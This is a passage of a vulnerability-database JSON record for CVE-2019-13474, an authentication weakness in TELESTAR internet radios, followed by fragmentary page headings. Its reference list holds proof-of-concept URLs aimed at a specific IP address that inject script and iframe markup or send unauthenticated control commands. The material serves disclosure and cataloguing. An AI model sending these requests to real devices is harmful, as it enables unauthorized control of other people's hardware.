        "trust": 0.1,
        "url": "http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/stream.wav\u0026name=name\u003e\u003c/iframe\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg\u003e\u003c/iframe\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://www.xing.com/companies/telestar-digitalgmbh"
      },
      {
        "trust": 0.1,
        "url": "https://www.vulnerability-lab.com/get_content.php?id=2190"
      },
      {
        "trust": 0.1,
        "url": "https://www.vuln-lab.com"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/set_dname?name=pwnd\u003e\u003c/iframe\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:8080"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/sendkey?key=3"
      },
      {
        "trust": 0.1,
        "url": "http://ncrack.org"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/setvol?vol=10\u0026mute=0"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/stop"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/hotkeylist"
      },
      {
        "trust": 0.1,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2019-13474"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/msg.wav\u0026save=1\u003e\u003c/iframe\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80:8080/playlogo.jpg"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/msg.wav\u0026save=1"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/init?language=us"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/\u0027;"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/localplay?url=http://vulnerability-lab.com/stream.wav\u0026name=name"
      },
      {
        "trust": 0.1,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2019-13473"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.178.93/set_dname?name=\u003e\u003cscript\u003ealert(1)\u003c/script\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/kayrus/iradio"
      },
      {
        "trust": 0.1,
        "url": "https://sites.google.com/site/tweakradje/devices/abeo-internet-radio"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "PACKETSTORM",
        "id": "154416"
      },
      {
        "db": "PACKETSTORM",
        "id": "174503"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "PACKETSTORM",
        "id": "154416"
      },
      {
        "db": "PACKETSTORM",
        "id": "174503"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-09-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "date": "2019-09-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "date": "2019-09-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "date": "2019-09-09T20:22:22",
        "db": "PACKETSTORM",
        "id": "154416"
      },
      {
        "date": "2023-09-05T14:43:51",
        "db": "PACKETSTORM",
        "id": "174503"
      },
      {
        "date": "2019-09-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      },
      {
        "date": "2019-09-16T12:15:10.847000",
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-08-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "date": "2023-09-05T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "date": "2019-09-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "date": "2020-08-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      },
      {
        "date": "2024-11-21T04:24:58.503000",
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  TELESTAR Authentication vulnerabilities in products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2019-13474 (GCVE-0-2019-13474)

FKIE_CVE-2019-13474

GHSA-QF9P-Q3FR-QF6R

GSD-2019-13474

VAR-201909-1008

References (Source):

CVE-ID:

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Vulnerability Class:

Current Estimated Price:

Product & Service Introduction:

Abstract Advisory Information:

Vulnerability Disclosure Timeline:

Discovery Status:

Exploitation Technique:

Severity Level:

Authentication Type:

User Interaction:

Disclosure Type:

Technical Details & Description:

For local network change to localhost or local ip

Tags

Sightings

Nomenclature